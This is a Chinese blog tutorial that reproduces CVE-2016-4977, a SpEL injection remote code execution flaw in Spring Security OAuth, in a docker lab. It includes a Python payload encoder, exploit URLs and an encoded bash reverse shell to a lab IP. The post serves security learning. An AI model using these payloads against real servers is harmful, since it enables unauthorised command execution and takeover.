spring常见漏洞(1)

最新推荐文章于 2024-05-17 01:51:11 发布
最新推荐文章于 2024-05-17 01:51:11 发布
阅读量446 收藏 10
点赞数 9
文章标签: spring spring boot 后端 web安全 网络 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80520893/article/details/135499113
版权

cve-2016-4977

Spring Security OAuth RCE(cve-2016-4977),是为Spring框架提供安全认证支持的一个模块,在7月5日其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。漏洞的发现者在10月13日公开了该漏洞的挖掘记录

影响版本

1.0.0-1.0.5、2.0.0-2.0.9

漏洞分析

这个漏洞的触发点也是对用户传的参数的递归解析,从而导致SpEL注入,可是两者的补丁方式大不相同。Springboot的修复方法是创建一个NonRecursive类,使解析函数不进行递归。而SpringSecurityOauth的修复方法则是在前缀${前生成一个六位的字符串,只有六位字符串与之相同才会对其作为表达式进行解析。然而如果请求足够多,这种补丁也是会失效的。

这里直接查看补丁情况

可以看到在第一次执行表达式之前程序将$替换成了由RandomValueStringGenerator().generate()生成的随机字符串,也就是${errorSummary} -> random{errorSummary},但是这个替换不是递归的,所以${2334-1}并没有变。

然后创建了一个helper使程序取random{}中的内容作为表达式,这样就使得errorSummary被作为表达式执行了,而${2334-1}因为不符合random{}这个形式所以没有被当作表达式,从而也就没有办法被执行了。

不过这个Patch有一个缺点:RandomValueStringGenerator生成的字符串虽然内容随机,但长度固定为6,所以存在暴力破解的可能性。

漏洞复现

首先进入CVE-2016-4977的docker环境

访问url,输入admin/admin

http://192.168.1.10:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test

出现以下界面则存在漏洞

使用github上找到的poc对传入值进行处理

#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
 poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)

这里我传入一个whoami,返回了一个payload

将这个payload拼接到之前的网址里面访问可以发现,这里返回了一个[java.lang.UNIXProcess@f2e3e13],说明代码已经执行了

http://127.0.0.1:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))}&client_id=acme&scope=openid&redirect_uri=http://test

这里使用curl发送一个请求即可得到回显得内容

这里再使用nc监听尝试反弹shell

使用到bash反弹,这里需要绕过exec()变形

使用http://www.jackson-t.ca/runtime-exec-payloads.html进行payload处理

将处理后的命令再放入poc.py

得到新的payload并拼接到网址里面

http://127.0.0.1:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toString(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(85)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}&client_id=acme&scope=openid&redirect_uri=http://test

然后再访问这个网站即可得到反弹shell

网安星星
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
spring框架漏洞整理(Spring Data漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 698
Spring Data漏洞Spring Data是一个用于简化数据库访问,并支持云服务的开源框架Spring Data Commons 是 Spring Data 下所有子项目共享的基础框架。 (CVE-2017-8046)Spring Data Rest 远程命令执行漏洞 影响范围PivotalSpringDataREST2.5.12 之前的版本,2.6.7 之前的版本,3.0RC3 之前的版本 SpringBoot2.0.0M4 之前版本,SpringDataKay-RC3 之前的版本 特征head
spring常见漏洞(前言)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-13 593
Spring的英文翻译为春天,可以说是给Java程序员带来了春天,因为它极大的简化了开发。得出一个公式:Spring = 春天 = Java程序员的春天 = 简化开发。最后的简化开发正是Spring框架带来的最大好处。Spring是一个开放源代码的设计层面框架,它是于2003 年兴起的一个轻量级的Java 开发框架。由Rod Johnson创建,其前身为Interface21框架,后改为了Spring并且正式发布。Spring是为了解决企业应用开发的复杂性而创建的。
Java 框架安全Spring 漏洞序列
最新发布
2401_84969389的博客
05-17 388
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
网络安全Spring框架漏洞总结(一)
kali_Ma的博客
09-10 2556
Spring简介 Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL (Spring Expr
Spring框架漏洞
weixin_68408599的博客
12-11 1317
以下框架漏洞均为Spring框架,讲解方式为漏洞产生原因以及漏洞复现,重点是漏洞复现的具体过程。
Spring 漏洞分析
weixin_30576859的博客
09-23 436
http://drops.wooyun.org/tips/2892 Spring框架问题分析 tang3·2014/09/01 11:29·来自乌云知识库 0x00 概述 Spring作为使用最为广泛的Java Web框架之一,拥有大量的用户。也由于用户量的庞大,Spring框架成为漏洞挖掘者关注的目标,在Struts漏洞狂出的如今,Spring也许正在被酝酿一场大的危机。 ...
Spring框架漏洞总结
weixin_42345596的博客
08-30 1082
Spring简介 Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL (Spring Expr
漏洞分析1
08-03
在本文中,我们将深入探讨一个名为"Spring-beans RCE漏洞分析1"的安全问题,它涉及到Spring框架中的远程代码执行(RCE)风险。这个漏洞主要出现在JDK 9及以上版本,并且与Spring-beans包以及Spring参数绑定机制有关...
java-sec-code:基于springbootspring security的Java Web常见漏洞安全代码
02-03
Java秒代码Java sec代码是用于学习Java漏洞代码的非常强大且友好的项目。介绍该项目也可以称为Java漏洞代码。 除非没有漏洞,否则默认情况下,每个漏洞类型代码都有一个安全漏洞。... spring.datasource.url=jd
Web编程常见漏洞与检测
05-16
Web编程常见漏洞与检测】 Web编程中的安全问题一直是开发者和系统管理员关注的重点。随着互联网技术的发展,Web应用越来越复杂,安全漏洞也随之多样化。本文将深入探讨几种常见Web漏洞及其检测方法,帮助Web...
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
04-12
docker 漏洞环境搭建docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2完成后访问二. 相关文章三. 常见 JDK 目录收集...
spring mvc 参数绑定漏洞
03-20
NULL 博文链接:https://yfm049.iteye.com/blog/860494
Spring Security CsrfFilter过滤器用法实例
08-25
跨站请求伪造(Cross-Site Request Forgery,CSRF)是一种常见Web应用程序安全漏洞。攻击者可以在用户不知情的情况下,伪造用户的请求,以便达到恶意目的。例如,攻击者可以通过在用户的浏览器中插入恶意脚本,...
spring框架漏洞整理(Springboot漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 4014
2016年爆出的一个漏洞Springboot漏洞利用条件 至少知道一个触发 springboot 默认错误页面的接口及参数名 利用方法 Springboot漏洞步骤一:找到一个正常传参处 比如发现访问/article?id=xxx,页面会报状态码为 500 的错误:Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。 Springboot漏洞步骤二:执行 SpEL 表达式
Spring 框架Spring Data Commons 组件 远程代码执行漏洞
简简单单Onlinezuozuo
07-12 5763
Spring 框架Spring Data Commons 组件 远程代码执行漏洞 2018年4月11日,阿里云云盾应急响应中心监测到Spring框架存在一系列漏洞。 1.Spring 框架 5.0-5.0.4,4.3 - 4.3.15 和更老的不被支持的版本中存在远程代码执行漏洞 允许应用通过Spring-Messaging模块搭建一个不落盘的STOMP消息中介,并在Websock...
Spring框架漏洞合集
小小猪的博客
08-18 7834
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要
Spring Cloud 再爆高危漏洞.... 赶紧修复
终码一生
03-07 5132
点击“终码一生”,关注,置顶公众号 每日技术干货,第一时间送达! Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway又突发高危漏洞,又得折腾了。。。 2022年3月1日,Spring官方发布了关于Spring Cloud Gateway的两个CVE漏洞,分别为CVE-2022-22946与CVE-2022-22947: 版本/分支/tag:3.4.X 问题描述: Spring Cloud Gateway 是 Spring Cloud .
Spring 框架相关漏洞详解合集
zjjcchina的博客
01-19 4190
虽说是 Spring 框架漏洞,但以下包含并不仅 Spring Framework,Spring Boot,还有 Spring Cloud,Spring Data,Spring Security 等。 CVE-2010-1622 Spring Framework class.classLoader 类远程代码执行 影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、SpringSource Spring Framework 2.5.0 - 2.5.7
网络安全Spring框架漏洞总结(二)
qq_44005305的博客
01-06 676
Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
Spring Security中有哪些常见安全漏洞
01-12
Spring Security中常见安全漏洞包括: 1. 跨站请求伪造(CSRF):攻击者通过伪造用户的身份,发送恶意请求来执行未经授权的操作。 2. 身份验证绕过:攻击者通过绕过身份验证机制,直接访问受限资源或执行敏感操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值